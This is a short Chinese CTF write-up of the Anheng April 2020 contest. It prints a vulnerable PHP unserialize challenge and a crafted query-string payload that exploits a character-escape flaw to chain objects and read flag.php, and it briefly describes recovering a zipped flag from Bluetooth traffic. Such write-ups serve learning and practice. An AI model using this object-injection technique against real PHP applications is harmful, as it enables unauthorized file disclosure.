0

安恒2020四月赛

 4 months ago
source link: https://yanmymickey.github.io/2020/04/25/CTF_WP/%E5%AE%89%E6%81%922020%E5%9B%9B%E6%9C%88%E8%B5%9B/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

安恒2020四月赛

Posted on

2020-04-25 Edited on 2021-01-16 In CTF , WP

Views: 9

安恒2020四月赛

只会做做简单题混混分😢

<?php

show_source("index.php");
function write ($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read ($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A {
public $username;
public $password;

function __construct ($a, $b) {
$this->username = $a;
$this->password = $b;
}
}

class B {
public $b ="gpy";
function __destruct () {
$c = 'a' . $this->b;
echo $c;
}
}

class C {
public $c;

function __toString () {
//flag.php
echo file_get_contents($this->c);
return 'nice';
}
}
$a = new A($_GET['a'],$_GET['b']);
$b = unserialize(read(write(serialize($a))));
function read ($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

read函数将chr(0) . '*' . chr(0)变为\0\0\0,但是前者只有三个字符,后者有六个字符,那么就会导致字符逃逸。

payload

?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=;s:";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}
curl --range 0-100 http://balabala/1Gfile.file

MISC1

下载是个流量包

简单浏览一下,是蓝牙的流量。

先按协议排一下序

mark

找蓝牙的传输协议OBEX

mark

把7z压缩包的数据块复制出来,用winhex或者010editor保存成7z文件,解压,要PIN

mark

去掉过滤器,ctrl+f查找一下有没有PIN,发现有的,解压得到flag

mark

mark

好好学习,天天向上

Buy me a coffee

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK